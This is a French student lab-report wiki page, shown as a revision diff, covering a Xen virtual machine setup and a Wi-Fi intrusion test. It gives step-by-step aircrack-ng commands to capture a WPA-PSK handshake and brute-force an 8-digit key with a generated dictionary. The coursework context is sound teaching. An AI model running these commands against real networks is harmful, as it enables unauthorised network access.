TP sysres IMA5sc 2019/2020 G4 : Différence entre versions
(→2. Installation des systèmes d’exploitation: machine virtuelle Xen) |
(→1ère seance: Installation de la machine virtuelle Xen) |
||
Ligne 1 : | Ligne 1 : | ||
==1ère seance: Installation de la machine virtuelle Xen== | ==1ère seance: Installation de la machine virtuelle Xen== | ||
− | ''' | + | '''choix du nom de domaine''' |
− | + | Sur le site gandi.net, j'ai acheté le nom de mon domaine qui est: blennoragie.site. | |
− | + | '''Installation de la machine virtuelle Xen''' | |
− | + | Via une connection en SSH à cordouan.insecserv.deule.net, j'ai installé l'image de la machine virtuelle Xen par la commande: | |
+ | xen-create-image --hostname=blennoragie --dhcp -- dir=/usr/local/xen | ||
− | |||
− | |||
− | |||
− | Adresse MAC obtenue: 00:16:3E: | + | |
+ | Adresse MAC obtenue: 00:16:3E:D6:E1:DF | ||
'''Lors de la 2ème séance:''' | '''Lors de la 2ème séance:''' | ||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
==3. Architecture réseau== | ==3. Architecture réseau== |
Version du 25 novembre 2019 à 17:09
Sommaire
1ère seance: Installation de la machine virtuelle Xen
choix du nom de domaine
Sur le site gandi.net, j'ai acheté le nom de mon domaine qui est: blennoragie.site.
Installation de la machine virtuelle Xen Via une connection en SSH à cordouan.insecserv.deule.net, j'ai installé l'image de la machine virtuelle Xen par la commande:
xen-create-image --hostname=blennoragie --dhcp -- dir=/usr/local/xen
Adresse MAC obtenue: 00:16:3E:D6:E1:DF
Lors de la 2ème séance:
3. Architecture réseau
4. Services Internet
5. Tests d’intrusion
Cassage de mot de passe WPA-PSK par force brute
Lors de la 2ème séance: Nous avons utilisé aircrack-ng pour lancer une recherche sur le mot de passe de l’identification par WPA-PSK en supposant que ce nombre est sur 8 chiffres. D'abord on vérifie que le Wi-Pi est connecté:
ls usb
Ensuite on récupère le nom de notre interface:
iwconfig
On obtient wlx40a5ef0125e9, si il n'est pas en mode 'Monitor' il est nécessaire de lancer la commande
airmon-ng start wlx40a5ef0125e9
On récupère alors tout les points d'accès accessibles en wifi (et donc l'adresse de la cible) via:
airodump-ng wlx40a5ef0125e9
Ensuite il faut récupérer le paquet OnCheck grâce à la commande suivante où -c permet de préciser le numéro du channel, -bssid l'adresse MAC de la cible et -w le path du fichier où écrire le résultat.
airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w ./home/pifou/packedOneCheck wlx40a5ef0125e9
Ensuite nous avons écrit un script Python pour générer le dictionnaire:
dictfile=open("dict.txt","a") for i in range(99999999): dictfile.write(str(i)+'\n') dictfile.close()
On peut alors lancer le cassage à l'aide de:
aircrack-ng -a2 -b 04:DA:D2:9C:50:5D -w path_to_dict/dict.txt path_to_packedOneCheck_result/*.cap